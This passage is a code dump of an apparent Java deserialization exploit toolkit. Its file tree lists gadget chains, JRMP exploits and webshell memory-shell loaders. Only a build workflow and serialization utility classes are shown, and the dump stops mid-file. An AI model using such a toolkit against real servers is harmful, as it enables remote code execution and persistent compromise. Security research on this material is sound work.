├── .github └── workflows │ └── maven.yml ├── README.md ├── attachments ├── Gadget-ChainBy-Whoopsunix.png ├── image-20240416174431675.png ├── image-20240416174734965.png ├── image-20240417155911348.png ├── image-20240419091148438.png ├── image-20240419101743213.png ├── image-20240419104955526.png ├── image-20240419110149928.png ├── image-20240419110957399.png ├── image-20240419111952995.png ├── image-20240419134742086.png ├── image-20240419143818623.png ├── image-20240421192532791.png ├── image-20240421232031498.png ├── image-20240422001459366.png ├── image-20240422171543240.png ├── image-20240423093150806.png ├── image-20240423093210772.png ├── image-20240423093228895.png ├── image-20240423103555978.png ├── image-20240423103622803.png ├── image-20240423115614913.png ├── image-20240423115636521.png ├── image-20240423140746943.png ├── image-20240423141545979.png ├── image-20240427090522783.png ├── image-20240427105643758.png ├── image-20240427155050391.png ├── image-20240504120717253.png ├── image-20240515095932731.png ├── image-20240515103534792.png └── image-20240515111004602.png ├── common ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── ppp │ ├── Printer.java │ ├── annotation │ ├── Authors.java │ └── Dependencies.java │ ├── enums │ ├── Output.java │ └── SerializationType.java │ ├── mix │ └── UTF8BytesMix.java │ └── utils │ ├── ClassFiles.java │ ├── Converter.java │ ├── Deserializer.java │ ├── FileUtils.java │ ├── PayloadUtils.java │ ├── RanDomUtils.java │ ├── Reflections.java │ ├── Serializer.java │ ├── Strings.java │ ├── UTF8OverlongObjectOutputStreamBak.java │ └── maker │ ├── AnnotationUtils.java │ ├── ClassUtils.java │ ├── CryptoUtils.java │ └── JavaClassUtils.java ├── exploit ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── ppp │ ├── ExploitBuilder.java │ ├── ExploitHelper.java │ └── exploit │ ├── Exploit.java │ ├── ExploitPayload.java │ ├── JRMPClient.java │ ├── JRMPListener.java │ └── RMIRegistryExploit.java ├── gadgets ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── ppp │ ├── KickOff.java │ ├── ObjectPayload.java │ ├── ObjectPayloadBuilder.java │ ├── chain │ ├── WrapSerialization.java │ ├── aspectjweaver │ │ └── AspectJWeaver.java │ ├── beanshell │ │ └── BeanShell1.java │ ├── c3p0 │ │ ├── C3P0.java │ │ ├── C3P0_EL.java │ │ ├── C3P0_Groovy.java │ │ └── C3P0_Yaml.java │ ├── clojure │ │ ├── Clojure1.java │ │ └── Clojure2.java │ ├── coherence │ │ ├── Coherence1.java │ │ ├── Coherence2.java │ │ ├── Coherence3.java │ │ └── Coherence4.java │ ├── commonsbeanutils │ │ ├── BeanComparatorBuilder.java │ │ ├── CBVersionEnum.java │ │ ├── CommonsBeanutils1.java │ │ ├── CommonsBeanutils2.java │ │ ├── CommonsBeanutils3.java │ │ ├── CommonsBeanutils4.java │ │ ├── CommonsBeanutils5.java │ │ ├── CommonsBeanutils6.java │ │ ├── CommonsBeanutils7.java │ │ └── CommonsBeanutils8.java │ ├── commonscollections3 │ │ ├── CommonsCollections1.java │ │ ├── CommonsCollections10.java │ │ ├── CommonsCollections1E.java │ │ ├── CommonsCollections3.java │ │ ├── CommonsCollections5.java │ │ ├── CommonsCollections6.java │ │ ├── CommonsCollections6E.java │ │ ├── CommonsCollections7.java │ │ ├── CommonsCollections9.java │ │ └── CommonsCollectionsK1.java │ ├── commonscollections4 │ │ ├── CommonsCollections2.java │ │ ├── CommonsCollections4.java │ │ ├── CommonsCollections8.java │ │ ├── CommonsCollectionsK2.java │ │ └── CommonsCollectionsK4.java │ ├── groovy │ │ ├── Groovy1.java │ │ └── Groovy2.java │ ├── hibernate │ │ ├── Hibernate1.java │ │ └── Hibernate2.java │ ├── jdk │ │ ├── JDK7u21.java │ │ ├── JDK7u21Lite.java │ │ ├── JDK7u21variant.java │ │ ├── JDK8u20.java │ │ ├── JDK8u20_2.java │ │ └── JDK8u20_3.java │ ├── jrmp │ │ ├── JRMPClient.java │ │ ├── JRMPClient2.java │ │ └── JRMPListener.java │ ├── json │ │ ├── FastJson.java │ │ ├── FastJson2.java │ │ ├── JSON1.java │ │ ├── Jackson.java │ │ └── Jackson2.java │ ├── jython │ │ ├── Jython1.java │ │ ├── Jython2.java │ │ ├── Jython3.java │ │ └── Jython4.java │ ├── mozillarhino │ │ ├── MozillaRhino1.java │ │ ├── MozillaRhino2.java │ │ └── MozillaRhino3.java │ ├── myface │ │ ├── Myfaces1.java │ │ └── Myfaces2.java │ ├── others │ │ ├── Atomikos.java │ │ ├── Ceylon.java │ │ ├── Click.java │ │ ├── FileUpload.java │ │ ├── JBossInterceptors.java │ │ ├── JavassistWeld.java │ │ ├── Scala.java │ │ ├── Struts2JasperReports.java │ │ ├── Vaadin.java │ │ ├── Wicket.java │ │ └── WildFly.java │ ├── rome │ │ ├── ROME.java │ │ ├── ROME2.java │ │ ├── ROME3.java │ │ └── ROME4.java │ ├── spring │ │ ├── Spring1.java │ │ ├── Spring2.java │ │ └── Spring3.java │ └── urldns │ │ ├── DNSHelper.java │ │ ├── Product.java │ │ ├── Subdomain.java │ │ └── URLDNS.java │ ├── secmgr │ ├── BlackInputStream.java │ ├── ExecCheckingSecurityManager.java │ ├── PayloadRunner.java │ └── WrapRunner.java │ ├── sinks │ ├── C3P0.java │ ├── Default.java │ ├── EL.java │ ├── InvokerTransformer3.java │ ├── InvokerTransformer4.java │ ├── JNDI.java │ ├── Jython.java │ ├── SinkScheduler.java │ ├── SinksHelper.java │ ├── TemplatesImpl.java │ └── annotation │ │ ├── EnchantEnums.java │ │ ├── EnchantType.java │ │ ├── GadgetDependency.java │ │ └── Sink.java │ └── utils │ ├── CommandUtils.java │ └── RemoteLoadD.java ├── javaClassBuilder ├── pom.xml └── src │ └── main │ └── java │ └── com │ └── ppp │ ├── JavaClassAdvanceBuilder.java │ ├── JavaClassBuilder.java │ ├── JavaClassHelper.java │ ├── annotation │ ├── Builder.java │ ├── JavaClassEnhance.java │ ├── JavaClassHelperType.java │ ├── JavaClassMakerEnhance.java │ ├── JavaClassModifiable.java │ ├── JavaClassType.java │ ├── MemShell.java │ ├── MemShellFunction.java │ ├── MemShellType.java │ └── Middleware.java │ ├── middleware │ ├── builder │ │ ├── JavaClassModifier.java │ │ ├── MSJavaClassBuilder.java │ │ ├── MSLoaderBuilder.java │ │ └── RceEchoBuilder.java │ ├── loader │ │ ├── JettyAutoFindListenerThreadLoader.java │ │ ├── JettyListenerThreadLoader.java │ │ ├── ResinFilterThreadLoader.java │ │ ├── ResinListenerThreadLoader.java │ │ ├── ResinServletThreadLoader.java │ │ ├── SpringControllerContextLoader.java │ │ ├── SpringInterceptorContextLoader.java │ │ ├── TomcatAutoFindExecutorThreadLoader.java │ │ ├── TomcatAutoFindListenerThreadLoader.java │ │ ├── TomcatAutoFindValveThreadLoader.java │ │ ├── TomcatFilterThreadLoader.java │ │ ├── TomcatListenerThreadLoader.java │ │ ├── TomcatServletThreadLoader.java │ │ ├── UndertowFilterThreadLoader.java │ │ ├── UndertowListenerThreadLoader.java │ │ └── UndertowServletThreadLoader.java │ ├── memshell │ │ ├── ControllerExec.java │ │ ├── ExecutorExec.java │ │ ├── FilterBehinder.java │ │ ├── FilterExec.java │ │ ├── FilterGodzilla.java │ │ ├── FilterSuo5.java │ │ ├── InterceptorExec.java │ │ ├── InterceptorGodzilla.java │ │ ├── InterceptorGodzillaRaw.java │ │ ├── ListenerBehinder.java │ │ ├── ListenerExec.java │ │ ├── ListenerGodzilla.java │ │ ├── ListenerSuo5.java │ │ ├── ServletBehinder.java │ │ ├── ServletExec.java │ │ ├── ServletGodzilla.java │ │ ├── ServletSuo5.java │ │ ├── ValveBehinder.java │ │ ├── ValveExec.java │ │ └── ValveGodzilla.java │ └── rceecho │ │ ├── JettyRE.java │ │ ├── ResinRE.java │ │ ├── SpringRE.java │ │ ├── TomcatAutoRE.java │ │ ├── TomcatRE.java │ │ └── UndertowRE.java │ └── scheduler │ ├── MemShellScheduler.java │ └── RceEchoScheduler.java ├── libs ├── coherence-rest.jar ├── coherence-web.jar └── coherence.jar ├── pom.xml └── scheduler ├── pom.xml └── src └── main ├── java └── com │ └── ppp │ ├── CliOptions.java │ ├── CliScheduler.java │ ├── Scheduler.java │ └── YamlScheduler.java └── resources └── PPPConfig.yml /.github/workflows/maven.yml: -------------------------------------------------------------------------------- 1 | name: Java CI with Maven 2 | 3 | on: 4 | push: 5 | branches: [ "main" ] 6 | pull_request: 7 | branches: [ "main" ] 8 | 9 | jobs: 10 | build: 11 | runs-on: ubuntu-latest 12 | env: 13 | artifactPath: scheduler/target 14 | steps: 15 | - uses: actions/checkout@v3 16 | 17 | - name: Set up JDK 8 18 | uses: actions/setup-java@v3 19 | with: 20 | java-version: '8' 21 | distribution: 'temurin' 22 | cache: maven 23 | 24 | - name: Install libs 25 | run: mvn clean 26 | 27 | - name: Build with Maven 28 | run: mvn clean package -Dmaven.test.skip 29 | 30 | - name: Find VERSION 31 | id: find_version 32 | run: | 33 | VERSION=$(find scheduler/target -name '*-jar-with-dependencies.jar' | sed 's/.*-\([0-9.]*\)-jar-with-dependencies\.jar/\1/') 34 | echo "::set-output name=version::$VERSION" 35 | echo "Extracted version: $VERSION" 36 | 37 | - name: Create release 38 | id: create_release 39 | uses: actions/create-release@v1 40 | with: 41 | tag_name: ${{ steps.find_version.outputs.version }} 42 | release_name: ${{ steps.find_version.outputs.version }} 43 | body: ${{ steps.find_version.outputs.version }} auto-generated by GitHub Actions 44 | draft: false 45 | prerelease: false 46 | env: 47 | GITHUB_TOKEN: ${{ secrets.GITHUBTOKEN }} 48 | 49 | - name: Upload release asset 50 | uses: actions/upload-release-asset@v1 51 | with: 52 | upload_url: ${{ steps.create_release.outputs.upload_url }} 53 | asset_path: ${{ env.artifactPath }}/PPPYSO-${{ steps.find_version.outputs.version }}-jar-with-dependencies.jar 54 | asset_name: PPPYSO-${{ steps.find_version.outputs.version }}.jar 55 | asset_content_type: application/java-archive 56 | env: 57 | GITHUB_TOKEN: ${{ secrets.GITHUBTOKEN }} 58 | -------------------------------------------------------------------------------- /attachments/Gadget-ChainBy-Whoopsunix.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/Gadget-ChainBy-Whoopsunix.png -------------------------------------------------------------------------------- /attachments/image-20240416174431675.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240416174431675.png -------------------------------------------------------------------------------- /attachments/image-20240416174734965.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240416174734965.png -------------------------------------------------------------------------------- /attachments/image-20240417155911348.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240417155911348.png -------------------------------------------------------------------------------- /attachments/image-20240419091148438.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419091148438.png -------------------------------------------------------------------------------- /attachments/image-20240419101743213.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419101743213.png -------------------------------------------------------------------------------- /attachments/image-20240419104955526.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419104955526.png -------------------------------------------------------------------------------- /attachments/image-20240419110149928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419110149928.png -------------------------------------------------------------------------------- /attachments/image-20240419110957399.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419110957399.png -------------------------------------------------------------------------------- /attachments/image-20240419111952995.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419111952995.png -------------------------------------------------------------------------------- /attachments/image-20240419134742086.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419134742086.png -------------------------------------------------------------------------------- /attachments/image-20240419143818623.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240419143818623.png -------------------------------------------------------------------------------- /attachments/image-20240421192532791.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240421192532791.png -------------------------------------------------------------------------------- /attachments/image-20240421232031498.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240421232031498.png -------------------------------------------------------------------------------- /attachments/image-20240422001459366.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240422001459366.png -------------------------------------------------------------------------------- /attachments/image-20240422171543240.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240422171543240.png -------------------------------------------------------------------------------- /attachments/image-20240423093150806.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423093150806.png -------------------------------------------------------------------------------- /attachments/image-20240423093210772.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423093210772.png -------------------------------------------------------------------------------- /attachments/image-20240423093228895.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423093228895.png -------------------------------------------------------------------------------- /attachments/image-20240423103555978.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423103555978.png -------------------------------------------------------------------------------- /attachments/image-20240423103622803.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423103622803.png -------------------------------------------------------------------------------- /attachments/image-20240423115614913.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423115614913.png -------------------------------------------------------------------------------- /attachments/image-20240423115636521.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423115636521.png -------------------------------------------------------------------------------- /attachments/image-20240423140746943.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423140746943.png -------------------------------------------------------------------------------- /attachments/image-20240423141545979.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240423141545979.png -------------------------------------------------------------------------------- /attachments/image-20240427090522783.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240427090522783.png -------------------------------------------------------------------------------- /attachments/image-20240427105643758.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240427105643758.png -------------------------------------------------------------------------------- /attachments/image-20240427155050391.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240427155050391.png -------------------------------------------------------------------------------- /attachments/image-20240504120717253.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240504120717253.png -------------------------------------------------------------------------------- /attachments/image-20240515095932731.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240515095932731.png -------------------------------------------------------------------------------- /attachments/image-20240515103534792.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240515103534792.png -------------------------------------------------------------------------------- /attachments/image-20240515111004602.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/PPPYSO/06448886147ee2256110b20b9797108492e72553/attachments/image-20240515111004602.png -------------------------------------------------------------------------------- /common/pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | 5 | com.ppp 6 | common 7 | 1.0 8 | jar 9 | 10 | common 11 | Whoopsunix 12 | 13 | 14 | UTF-8 15 | 16 | 17 | 18 | 19 | com.thoughtworks.xstream 20 | xstream 21 | 1.4.17 22 | 23 | 24 | org.javassist 25 | javassist 26 | 3.29.2-GA 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | common 37 | 38 | 39 | org.apache.maven.plugins 40 | maven-compiler-plugin 41 | 42 | 6 43 | 6 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/annotation/Authors.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | import java.lang.reflect.AnnotatedElement; 8 | 9 | @Target(ElementType.TYPE) 10 | @Retention(RetentionPolicy.RUNTIME) 11 | public @interface Authors { 12 | String FROHOFF = "frohoff"; 13 | String PWNTESTER = "pwntester"; 14 | String CSCHNEIDER4711 = "cschneider4711"; 15 | String MBECHLER = "mbechler"; 16 | String JACKOFMOSTTRADES = "JackOfMostTrades"; 17 | String MATTHIASKAISER = "matthias kaiser"; 18 | String CCKUAILONG = "cckuailong"; 19 | String JACOBAINES = "jacob-baines"; 20 | String JASINNER = "jasinner"; 21 | String KULLRICH = "kai_ullrich"; 22 | String TINT0 = "_tint0"; 23 | String SCRISTALLI = "scristalli"; 24 | String HANYRAX = "hanyrax"; 25 | String EDOARDOVIGNATI = "EdoardoVignati"; 26 | String JANG = "Jang"; 27 | String ARTSPLOIT = "artsploit"; 28 | String Y4tacker = "Y4tacker"; 29 | String oneueo = "1ueo"; 30 | String NAVALORENZO = "navalorenzo"; 31 | 32 | String KORLR = "koalr"; 33 | String MEIZJM3I = "meizjm3i"; 34 | String SCICCONE = "sciccone"; 35 | String ZEROTHOUGHTS = "zerothoughts"; 36 | String YKOSTER = "ykoster"; 37 | String POTATS0 = "potats0"; 38 | String PHITHON = "phith0n"; 39 | String SSEELEY = "steven_seeley"; 40 | String RCALVI = "rocco_calvi"; 41 | String TESTANULL = "testanull"; 42 | String Firebasky = "Firebasky"; 43 | String SummerSec = "SummerSec"; 44 | String DROPLET = "水滴"; 45 | String Whoopsunix = "Whoopsunix"; 46 | String Y4ER = "Y4er"; 47 | String FEIHONG = "feihong-cs"; 48 | String ONENHANN = "1nhann"; 49 | String COKEBEER = "cokeBeer"; 50 | String ZDI = "ZDI"; 51 | String HUGOW = "hugow"; 52 | String h0ng10="h0ng10"; 53 | 54 | String[] value() default {}; 55 | 56 | public static class Utils { 57 | public static String[] getAuthors(AnnotatedElement annotated) { 58 | Authors authors = annotated.getAnnotation(Authors.class); 59 | if (authors != null && authors.value() != null) { 60 | return authors.value(); 61 | } else { 62 | return new String[0]; 63 | } 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/annotation/Dependencies.java: -------------------------------------------------------------------------------- 1 | package com.ppp.annotation; 2 | 3 | import java.lang.annotation.ElementType; 4 | import java.lang.annotation.Retention; 5 | import java.lang.annotation.RetentionPolicy; 6 | import java.lang.annotation.Target; 7 | import java.lang.reflect.AnnotatedElement; 8 | 9 | @Target(ElementType.TYPE) 10 | @Retention(RetentionPolicy.RUNTIME) 11 | public @interface Dependencies { 12 | String[] value() default {}; 13 | 14 | public static class Utils { 15 | public static String[] getDependencies(AnnotatedElement annotated) { 16 | Dependencies deps = annotated.getAnnotation(Dependencies.class); 17 | if (deps != null && deps.value() != null) { 18 | return deps.value(); 19 | } else { 20 | return new String[0]; 21 | } 22 | } 23 | 24 | public static String[] getDependenciesSimple(AnnotatedElement annotated) { 25 | String[] deps = getDependencies(annotated); 26 | String[] simple = new String[deps.length]; 27 | for (int i = 0; i < simple.length; i++) { 28 | simple[i] = deps[i].split(":", 2)[1]; 29 | } 30 | return simple; 31 | } 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/enums/Output.java: -------------------------------------------------------------------------------- 1 | package com.ppp.enums; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | * 8 | * 加密方法 9 | */ 10 | public enum Output { 11 | Default, 12 | Base64, 13 | GZIP, 14 | ; 15 | 16 | public static Output[] splitOutput(String output) { 17 | String[] split = output.split(","); 18 | Output[] outputs = new Output[split.length]; 19 | for (int i = 0; i < split.length; i++) { 20 | outputs[i] = getOutput(split[i]); 21 | } 22 | return outputs; 23 | } 24 | public static Output getOutput(String output) { 25 | for (Output value : values()) { 26 | if (value.name().equalsIgnoreCase(output)) { 27 | return value; 28 | } 29 | } 30 | Printer.warn(String.format("No such output: %s , use Default", output)); 31 | return Default; 32 | } 33 | } -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/enums/SerializationType.java: -------------------------------------------------------------------------------- 1 | package com.ppp.enums; 2 | 3 | import com.ppp.Printer; 4 | 5 | /** 6 | * @author Whoopsunix 7 | * 8 | * 序列化方法 9 | */ 10 | public enum SerializationType { 11 | Default, 12 | XStream, 13 | HexAscii, 14 | UTF8Mix, 15 | ; 16 | 17 | public static SerializationType getSerializationType(String serializationType) { 18 | for (SerializationType value : values()) { 19 | if (value.name().equalsIgnoreCase(serializationType)) { 20 | return value; 21 | } 22 | } 23 | Printer.warn(String.format("No such serializationType: %s , use Default", serializationType)); 24 | return Default; 25 | } 26 | } -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/ClassFiles.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | 7 | public class ClassFiles { 8 | public static String classAsFile(final Class clazz) { 9 | return classAsFile(clazz, true); 10 | } 11 | 12 | public static String classAsFile(final Class clazz, boolean suffix) { 13 | String str; 14 | if (clazz.getEnclosingClass() == null) { 15 | str = clazz.getName().replace(".", "/"); 16 | } else { 17 | str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); 18 | } 19 | if (suffix) { 20 | str += ".class"; 21 | } 22 | return str; 23 | } 24 | 25 | public static byte[] classAsBytes(final Class clazz) { 26 | try { 27 | final byte[] buffer = new byte[1024]; 28 | final String file = classAsFile(clazz); 29 | final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file); 30 | if (in == null) { 31 | throw new IOException("couldn't find '" + file + "'"); 32 | } 33 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 34 | int len; 35 | while ((len = in.read(buffer)) != -1) { 36 | out.write(buffer, 0, len); 37 | } 38 | return out.toByteArray(); 39 | } catch (IOException e) { 40 | throw new RuntimeException(e); 41 | } 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/Deserializer.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import java.io.*; 4 | import java.util.concurrent.Callable; 5 | import java.util.zip.GZIPInputStream; 6 | 7 | /** 8 | * 反序列化工具类 9 | */ 10 | public class Deserializer implements Callable { 11 | private final byte[] bytes; 12 | 13 | public Deserializer(byte[] bytes) { 14 | this.bytes = bytes; 15 | } 16 | 17 | public Object call() throws Exception { 18 | return deserialize(bytes); 19 | } 20 | 21 | /** 22 | * original 23 | */ 24 | public static Object deserializeBase64(final String base64Str) throws Exception { 25 | final byte[] serialized = new sun.misc.BASE64Decoder().decodeBuffer(base64Str); 26 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 27 | return deserialize(in); 28 | } 29 | public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException { 30 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 31 | return deserialize(in); 32 | } 33 | 34 | public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException { 35 | final ObjectInputStream objIn = new ObjectInputStream(in); 36 | return objIn.readObject(); 37 | } 38 | 39 | public static Object deserializeFile(final String filePath) throws ClassNotFoundException, IOException { 40 | FileInputStream fileInputStream = new FileInputStream(filePath); 41 | return deserialize(fileInputStream); 42 | } 43 | 44 | /** 45 | * Gzip 46 | */ 47 | public static Object deserializeBase64GZip(final String base64Str) throws IOException, ClassNotFoundException { 48 | final byte[] serialized = new sun.misc.BASE64Decoder().decodeBuffer(base64Str); 49 | return deserializeGZip(serialized); 50 | } 51 | public static Object deserializeGZip(final byte[] serialized) throws IOException, ClassNotFoundException { 52 | final ByteArrayInputStream in = new ByteArrayInputStream(serialized); 53 | return deserializeGZip(in); 54 | } 55 | public static Object deserializeGZip(final InputStream in) throws ClassNotFoundException, IOException { 56 | final GZIPInputStream gzipIn = new GZIPInputStream(in); 57 | final ObjectInputStream objIn = new ObjectInputStream(gzipIn); 58 | return objIn.readObject(); 59 | } 60 | } -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/FileUtils.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import java.io.FileInputStream; 4 | import java.util.ArrayList; 5 | import java.util.List; 6 | import java.io.File; 7 | 8 | /** 9 | * @author Whoopsunix 10 | */ 11 | public class FileUtils { 12 | public static void main(String[] args) throws Exception { 13 | splitFile("/tmp/busybox", 1024 * 100); 14 | } 15 | 16 | /** 17 | * 文件分片 1kb 为单位 18 | * @param localFilePath 19 | * @param splitLength 20 | * @return 21 | * @throws Exception 22 | */ 23 | public static List splitFile(String localFilePath, int splitLength) throws Exception { 24 | splitLength = splitLength * 1024; 25 | List parts = new ArrayList(); 26 | File inputFile = new File(localFilePath); 27 | FileInputStream fileInputStream = new FileInputStream(inputFile); 28 | 29 | byte[] buffer = new byte[splitLength]; 30 | int bytesRead; 31 | 32 | while ((bytesRead = fileInputStream.read(buffer)) != -1) { 33 | byte[] part = new byte[bytesRead]; 34 | System.arraycopy(buffer, 0, part, 0, bytesRead); 35 | parts.add(part); 36 | } 37 | 38 | fileInputStream.close(); 39 | return parts; 40 | } 41 | 42 | /** 43 | * 读取文件 44 | * @param localFilePath 45 | * @return 46 | * @throws Exception 47 | */ 48 | public static byte[] fileRead(String localFilePath) throws Exception { 49 | FileInputStream fileInputStream = new FileInputStream(localFilePath); 50 | byte[] contentBytes = new byte[fileInputStream.available()]; 51 | fileInputStream.read(contentBytes); 52 | fileInputStream.close(); 53 | return contentBytes; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /common/src/main/java/com/ppp/utils/Serializer.java: -------------------------------------------------------------------------------- 1 | package com.ppp.utils; 2 | 3 | import com.ppp.utils.maker.CryptoUtils; 4 | import com.thoughtworks.xstream.XStream; 5 | 6 | import java.io.*; 7 | import java.util.concurrent.Callable; 8 | import java.util.zip.GZIPOutputStream; 9 | 10 | /** 11 | * 序列化工具类 12 | */ 13 | public class Serializer implements Callable { 14 | private final Object object; 15 | 16 | public Serializer(Object object) { 17 | this.object = object; 18 | } 19 | 20 | public byte[] call() throws Exception { 21 | return serialize(object); 22 | } 23 | 24 | /** 25 | * 原始 26 | */ 27 | public static byte[] serialize(final Object obj) throws IOException { 28 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 29 | serialize(obj, out); 30 | return out.toByteArray(); 31 | } 32 | 33 | public static void serialize(final Object obj, final OutputStream out) throws IOException { 34 | final ObjectOutputStream objOut = new ObjectOutputStream(out); 35 | objOut.writeObject(obj); 36 | } 37 | 38 | /** 39 | * Gzip 40 | */ 41 | public static byte[] serializeGZip(final Object obj) throws IOException { 42 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 43 | serializeGZip(obj, out); 44 | return out.toByteArray(); 45 | } 46 | 47 | public static void serializeGZip(final Object obj, final OutputStream out) throws IOException { 48 | final GZIPOutputStream gzipOut = new GZIPOutputStream(out); 49 | final ObjectOutputStream objOut = new ObjectOutputStream(gzipOut); 50 | objOut.writeObject(obj); 51 | objOut.close(); 52 | } 53 | 54 | /** 55 | * Base64 javaClass 56 | */ 57 | public static String serializeClassFilesBase64(Class clazz) throws Exception { 58 | byte[] bytes = ClassFiles.classAsBytes(clazz); 59 | return CryptoUtils.base64encoder(bytes); 60 | } 61 | 62 | /** 63 | * XStream <= 1.4.17 64 | */ 65 | public static String serializeXStream(Object object) { 66 | XStream xstream = new XStream(); 67 | return xstream.toXML(object); 68 | } 69 | 70 | /** 71 | * 十六进制 72 | */ 73 | public static String serializeHexAscii(Object object) throws Exception { 74 | byte[] bytes = serialize(object); 75 | int len = bytes.length; 76 | StringWriter sw = new StringWriter(len * 2); 77 | for (int i = 0; i < len; ++i) 78 | addHexAscii(bytes[i], sw); 79 | return sw.toString(); 80 | } 81 | 82 | static void addHexAscii(byte b, StringWriter sw) 